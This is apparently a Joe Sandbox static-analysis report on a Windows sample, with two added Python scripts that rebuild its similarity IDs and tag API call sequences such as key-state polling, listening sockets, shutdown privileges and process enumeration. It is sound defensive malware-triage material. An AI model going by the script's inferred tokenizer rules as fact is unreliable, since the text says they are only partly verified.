                                                                        • Opcode ID: 0e458219f318b4e5aee537865bc224f5621af6645dbc063115179087fa67a4b1
                                                                        • Instruction ID: acfaee03ae014cbee398904dc92cceebaff87244dd3a2c3d0e9e9ab651ec684e
                                                                        • Opcode Fuzzy Hash: 0e458219f318b4e5aee537865bc224f5621af6645dbc063115179087fa67a4b1
                                                                        • Instruction Fuzzy Hash: 25E15C71604204AFCB14DF29C995E2ABBE8FF89350F04896DF94AD72A1DB30E905CB52
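                                                                        The "API ID" under Similarity is not a hash but a readable profile of the imports a function calls: the names in the APIs list (subcall entries included) are split into words, the frequent words come first, and `$` separates frequency groups. That makes it a useful key for matching a function against the same function in another report, for instance to separate interpreter runtime from payload code in a sample the report flags as a likely compiled AutoIt script. The script below is an added example, not Joe Sandbox code or documentation; the token rules it applies (CamelCase split, words shorter than four characters dropped, CRT names beginning with an underscore kept whole, groups ordered by count, ASCII order inside a group) are inferred from the blocks on this page and are an assumption, verified only against the stated IDs of the registry function directly above and the FindFirstFileW/SetFileAttributesW walk earlier in this section, whose APIs lines are copied in as sample input.

```python
import re
from collections import Counter

# One "APIs" entry as printed in a Joe Sandbox function block, e.g.
#   • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941B50
#   • _wcscmp.LIBCMT ref: 00941B65
#   • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
# The import name is whatever precedes the ".MODULE" separator.
API_RE = re.compile(r"([A-Za-z_]\w*)\.[A-Z][A-Z0-9]*")
CAMEL_RE = re.compile(r"[A-Z][a-z0-9]*")
# Assumption inferred from this page: Get/Set/Reg/Ex/W/Key/Sid/Ace/Add/To
# never show up in an API ID, so words shorter than four characters are dropped.
MIN_TOKEN = 4


def api_names(block):
    """Import names listed in an APIs block, subcall entries included, in order."""
    return [m.group(1) for m in (API_RE.search(l) for l in block.splitlines()) if m]


def tokens(name):
    """Split one import name into the words Joe Sandbox appears to count."""
    if name.startswith("_"):  # CRT names (_wcscmp, __swprintf, _memset) stay whole
        return [name]
    return [t for t in CAMEL_RE.findall(name) if len(t) >= MIN_TOKEN]


def api_id(block):
    """Rebuild the Similarity 'API ID' string for an APIs block."""
    counts = Counter(t for n in api_names(block) for t in tokens(n))
    groups = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    # most frequent words first; inside a group plain ASCII order (uppercase before '_')
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def check(block, stated):
    """True when our reconstruction matches the ID printed in the report."""
    return api_id(block) == stated


# Sample input copied from this report: the RegConnectRegistryW function above.
REGISTRY_BLOCK = """\
• Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0095328E
• Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
• Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0095332D
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009533C5
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00953604
• RegCloseKey.ADVAPI32(00000000), ref: 00953611
"""
REGISTRY_ID = "CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf"

# Sample input copied from this report: the recursive FindFirstFileW/SetFileAttributesW walk.
FILE_WALK_BLOCK = """\
• FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941B50
• _wcscmp.LIBCMT ref: 00941B65
• _wcscmp.LIBCMT ref: 00941B7C
• GetFileAttributesW.KERNEL32(?), ref: 00941B8E
• SetFileAttributesW.KERNEL32(?,?), ref: 00941BA8
• FindNextFileW.KERNEL32(00000000,?), ref: 00941BC0
• FindClose.KERNEL32(00000000), ref: 00941BCB
• FindFirstFileW.KERNEL32(*.*,?), ref: 00941BE7
• _wcscmp.LIBCMT ref: 00941C0E
• _wcscmp.LIBCMT ref: 00941C25
• SetCurrentDirectoryW.KERNEL32(?), ref: 00941C37
• SetCurrentDirectoryW.KERNEL32(009A39FC), ref: 00941C55
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00941C5F
• FindClose.KERNEL32(00000000), ref: 00941C6C
• FindClose.KERNEL32(00000000), ref: 00941C7C
"""
FILE_WALK_ID = "Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext"


if __name__ == "__main__":
    for label, block, stated in (("RegRead", REGISTRY_BLOCK, REGISTRY_ID),
                                 ("FileWalk", FILE_WALK_BLOCK, FILE_WALK_ID)):
        print(label, api_id(block), "OK" if check(block, stated) else "MISMATCH")
```

                                                                        To use it on another report, paste that report's APIs lines into a string and compare `api_id()` results, or diff the IDs directly; two functions that share both an API ID and a String ID are near-identical code even when their addresses and fuzzy hashes differ between builds. Because the rules are inferred, treat a mismatch on a new block as a sign that the tokenizer needs adjusting rather than that the function differs.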
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00932B5F
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00932BE0
                                                                        • GetKeyState.USER32(000000A0), ref: 00932BFB
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00932C15
                                                                        • GetKeyState.USER32(000000A1), ref: 00932C2A
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00932C42
                                                                        • GetKeyState.USER32(00000011), ref: 00932C54
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00932C6C
                                                                        • GetKeyState.USER32(00000012), ref: 00932C7E
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00932C96
                                                                        • GetKeyState.USER32(0000005B), ref: 00932CA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 108045adf919256da86af8791fb654e5bbd858dece5773e10b38573795ed4e88
                                                                        • Instruction ID: 5081b4277e49ccaaeccec1cd04bb465ea07ef698eda978c670b499f540413b13
                                                                        • Opcode Fuzzy Hash: 108045adf919256da86af8791fb654e5bbd858dece5773e10b38573795ed4e88
                                                                        • Instruction Fuzzy Hash: E841D8345087C96EFF359B6488443B9FEF96F12344F049099D5C6562C1DBA49DC4CFA2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: d7a84d4fab13720c46c584c503085bd728338cec00945095d4df53e7329b6bb6
                                                                        • Instruction ID: 820debaf60f1a82e741a4bb0fb7d821f3939205a28e011bcbd4ca2f9d4a583b0
                                                                        • Opcode Fuzzy Hash: d7a84d4fab13720c46c584c503085bd728338cec00945095d4df53e7329b6bb6
                                                                        • Instruction Fuzzy Hash: CF219A72715610AFEB01AF64DC49F2E77A8FF85721F00841AF94ADB2A1DB34E8419B91
                                                                        APIs
                                                                          • Part of subcall function 00929ABF: CLSIDFromProgID.OLE32 ref: 00929ADC
                                                                          • Part of subcall function 00929ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00929AF7
                                                                          • Part of subcall function 00929ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00929B05
                                                                          • Part of subcall function 00929ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00929B15
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0094C235
                                                                        • _memset.LIBCMT ref: 0094C242
                                                                        • _memset.LIBCMT ref: 0094C360
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0094C38C
                                                                        • CoTaskMemFree.OLE32(?), ref: 0094C397
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 0094C3E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 7b27100e90c1c58a2bd071ceab410deae5378cc58182682b115630d4e5e19cc4
                                                                        • Instruction ID: 5009572ce531790bfa79753c90ddd853df74f15183a6cb53b6d37c5488f6c03f
                                                                        • Opcode Fuzzy Hash: 7b27100e90c1c58a2bd071ceab410deae5378cc58182682b115630d4e5e19cc4
                                                                        • Instruction Fuzzy Hash: 53913971D01218AFDB10DFA4DC51EEEBBB8EF48310F10812AF519A7291EB709A45CFA1
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00941FE1
                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00942011
                                                                        • _wcscmp.LIBCMT ref: 00942025
                                                                        • _wcscmp.LIBCMT ref: 00942040
                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009420DE
                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009420F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep
                                                                        • String ID: *.*
                                                                        • API String ID: 3356411064-438819550
                                                                        • Opcode ID: da1eff7110423e53b3213a4cd5b40806e213c3e02c44ac2a1c8e1f2f31fa540a
                                                                        • Instruction ID: 343d3d1166c97d1efb8179eafcd8aedb2e7449e010e9ab73359d4e12e288dfa1
                                                                        • Opcode Fuzzy Hash: da1eff7110423e53b3213a4cd5b40806e213c3e02c44ac2a1c8e1f2f31fa540a
                                                                        • Instruction Fuzzy Hash: 7C41597190520EAFCF14DFA4C849BEEBBB8FF45314F544456F915A3291EB709A84CB90
                                                                        APIs
                                                                          • Part of subcall function 0092B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092B180
                                                                          • Part of subcall function 0092B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092B1AD
                                                                          • Part of subcall function 0092B134: GetLastError.KERNEL32 ref: 0092B1BA
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00937A0F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 378f2ce2ce9ee86bae41c18a3d7fd49c2ebb3b9fc819fc4e3e79be8b33b9a409
                                                                        • Instruction ID: 63f611afbbe8d49a96c95efbc23600c017b4269e2aa29bab717e3a709a85b6cd
                                                                        • Opcode Fuzzy Hash: 378f2ce2ce9ee86bae41c18a3d7fd49c2ebb3b9fc819fc4e3e79be8b33b9a409
                                                                        • Instruction Fuzzy Hash: BA01F7B26692216AF73816E89C8BBBFB26C9B00341F140824F903E20C2E5645E0099B0
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00948CA8
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948CB7
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00948CD3
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00948CE2
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948CFC
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00948D10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 53059a54e57e683fd61591a8f325389eb9711fd19b73d2a559f03c1bcbfb1a6e
                                                                        • Instruction ID: 3a4f7f190450252bf2afdf665e0a8a03c47b7c5b1e5199f10c35cc3f6d85a5a0
                                                                        • Opcode Fuzzy Hash: 53059a54e57e683fd61591a8f325389eb9711fd19b73d2a559f03c1bcbfb1a6e
                                                                        • Instruction Fuzzy Hash: 7721A072601204AFCB14AF68CD85F6EB7B9FF48710F148558F95AA73D2CB30AD419B51
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0092AFAE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0092AFB5
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0092AFC4
                                                                        • CloseHandle.KERNEL32(00000004), ref: 0092AFCF
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092AFFE
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 0092B012
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: e56e3338b809af49a2f37dc3b267b8a68fa0fac9f53d9f4a910b2070ecfd8b55
                                                                        • Instruction ID: 7030dca60e131ebe61f8552849516560f2ad33acfd8115c1b05401d085c6bfe7
                                                                        • Opcode Fuzzy Hash: e56e3338b809af49a2f37dc3b267b8a68fa0fac9f53d9f4a910b2070ecfd8b55
                                                                        • Instruction Fuzzy Hash: D3215BB3145219AFDF028FA4EE09FEE7BADEF44304F044015FA05A2165D37A9D61EB61
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00936554
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00936564
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00936583
                                                                        • __wsplitpath.LIBCMT ref: 009365A7
                                                                        • _wcscat.LIBCMT ref: 009365BA
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009365F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1605983538-0
                                                                        • Opcode ID: 263ac08e7eea5805ce3877a6f41c0246e5409d9897fabd686157bb002ba0ccc9
                                                                        • Instruction ID: b4eb13b95db3bf8ec987af530b643009cc93303354cd216c30a308b34e944331
                                                                        • Opcode Fuzzy Hash: 263ac08e7eea5805ce3877a6f41c0246e5409d9897fabd686157bb002ba0ccc9
                                                                        • Instruction Fuzzy Hash: 81217F71904218ABDB20ABA4CC88BEEB7BCAB48300F5044A5F505E7141EB759B85CFA0
                                                                        APIs
                                                                          • Part of subcall function 0094A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00949296
                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009492B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: 0cd2a0b9ceeea71f6111acb847ff007d291c590edf1a34d1c56a950f69cdb204
                                                                        • Instruction ID: 9039ca7c987882995549ad6cadc10368857ccf0c9061f4206878ef357de94a31
                                                                        • Opcode Fuzzy Hash: 0cd2a0b9ceeea71f6111acb847ff007d291c590edf1a34d1c56a950f69cdb204
                                                                        • Instruction Fuzzy Hash: D641AE71600204AFEB14AF688886F7F77EDEF84724F148548F956AB3D2DB749D018B91
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093EB8A
                                                                        • _wcscmp.LIBCMT ref: 0093EBBA
                                                                        • _wcscmp.LIBCMT ref: 0093EBCF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0093EBE0
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0093EC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: 2670b9f3661d20594cf783c680df059278d12e0369e816d5866bc5103b8546f0
                                                                        • Instruction ID: 5cea1dc0079a3c171bedf351bfce24bb6d1c65f561fb864752c1a23725dd4725
                                                                        • Opcode Fuzzy Hash: 2670b9f3661d20594cf783c680df059278d12e0369e816d5866bc5103b8546f0
                                                                        • Instruction Fuzzy Hash: 6941AC35604602DFD718DF28C491AAAB3E8FF89324F10455DF99A8B3E1DB35A984CF91
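The API lists in the function blocks above (the GetAsyncKeyState/GetKeyState modifier polling, the socket/bind/listen sequence, LookupPrivilegeValueW/AdjustTokenPrivileges ahead of ExitWindowsEx, the Toolhelp32 process walk, CreateProcessWithLogonW, and the two FindFirstFileW/FindNextFileW loops) are what an analyst actually triages from a report like this, and the raw hex argument columns hide which constants are being passed. The following is an added example of my own, not code from the Joe Sandbox report or its IDA plugin: it parses API lines in the format shown above, resolves a handful of well-known Win32/Winsock constants by argument slot (0xA0/0xA1/0x11/0x12/0x5B are VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN; 2/1/6 to socket() are AF_INET, SOCK_STREAM, IPPROTO_TCP; 2 to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS), and tags each block with the behaviour its call sequence implies. The line regex, the constant tables and the rule labels are this example's own choices, and the sample input is a trimmed copy of lines from the blocks above.

```python
"""Triage Joe Sandbox-style API trace blocks (added example, not report tooling).
Rule names and constant tables are this example's own choices."""
import re
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

# One API line: optional "Part of subcall function X:" prefix, then Name.MODULE,
# an optional "(args)" list, an optional comma, then "ref: addr".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address for "Part of subcall" lines, else None

# Constants worth resolving in a given argument slot. The report prints raw stack
# slots, so only the leading slots of a call are reliable.
VK = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
ARG_CONSTANTS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("GetAsyncKeyState", 0): VK,
    ("GetKeyState", 0): VK,
    ("socket", 0): {2: "AF_INET"},
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
    ("socket", 2): {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"},
    ("CreateToolhelp32Snapshot", 0): {2: "TH32CS_SNAPPROCESS"},
}

# Behaviour tags (this example's labels): every API in the set must appear in the block.
RULES: List[Tuple[str, Set[str]]] = [
    ("modifier-key state polling", {"GetAsyncKeyState", "GetKeyState"}),
    ("listening TCP socket", {"socket", "bind", "listen"}),
    ("privilege adjustment before ExitWindowsEx", {"AdjustTokenPrivileges", "ExitWindowsEx"}),
    ("process enumeration via Toolhelp32", {"CreateToolhelp32Snapshot", "Process32NextW"}),
    ("directory enumeration", {"FindFirstFileW", "FindNextFileW"}),
    ("process creation as another user", {"CreateProcessWithLogonW"}),
]

def parse_blocks(text: str) -> List[List[Call]]:
    """Split the text at each 'APIs' header and collect the call lines under it."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return blocks

def decode_args(call: Call) -> List[str]:
    """Resolve known hex constants per slot; keep '?' and string literals unchanged."""
    out = []
    for i, arg in enumerate(call.args):
        try:
            value = int(arg, 16)
        except ValueError:  # "?" (unknown) or a string literal such as *.*
            out.append(arg)
            continue
        out.append(ARG_CONSTANTS.get((call.api, i), {}).get(value, f"0x{value:X}"))
    return out

def classify(block: List[Call]) -> List[str]:
    names = {c.api for c in block}  # subcall lines count towards the block
    return [label for label, required in RULES if required <= names]

def triage(text: str) -> List[dict]:
    """Per block: decoded calls plus the behaviour tags the sequence implies."""
    return [{"calls": [f"{c.api}({', '.join(decode_args(c))})" for c in block],
             "behaviours": classify(block)} for block in parse_blocks(text)]

# Constructed input: trimmed copies of API lines in the report's own format.
SAMPLE = """\
APIs
• GetAsyncKeyState.USER32(000000A0), ref: 00932BE0
• GetKeyState.USER32(00000011), ref: 00932C54
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00948CA8
• bind.WSOCK32(00000000,?,00000010), ref: 00948CD3
• listen.WSOCK32(00000000,00000005), ref: 00948CE2
APIs
  • Part of subcall function 0092B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092B1AD
  • Part of subcall function 0092B134: GetLastError.KERNEL32 ref: 0092B1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00937A0F
"""

if __name__ == "__main__":
    for i, entry in enumerate(triage(SAMPLE)):
        print(f"block {i}: {entry['behaviours']}")
        for call in entry["calls"]:
            print("   ", call)
```

Two caveats when reading the tags. "Part of subcall function" lines are attributed to a callee, so a tag can fire because of a helper the block merely calls; keep the `subcall` field when you need to say which function holds the capability. And static API lists show capability present in the binary, not behaviour observed at runtime: a stub that embeds a scripting interpreter (a compiled AutoIt executable, for instance) carries the interpreter's whole built-in library, so blocks for listening sockets, RunAs-style process creation or shutdown privileges will be present whether or not the script ever uses them; confirm with the dynamic trace before reporting them as behaviour.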
                                                                        APIs
                                                                        Memory Dump Source
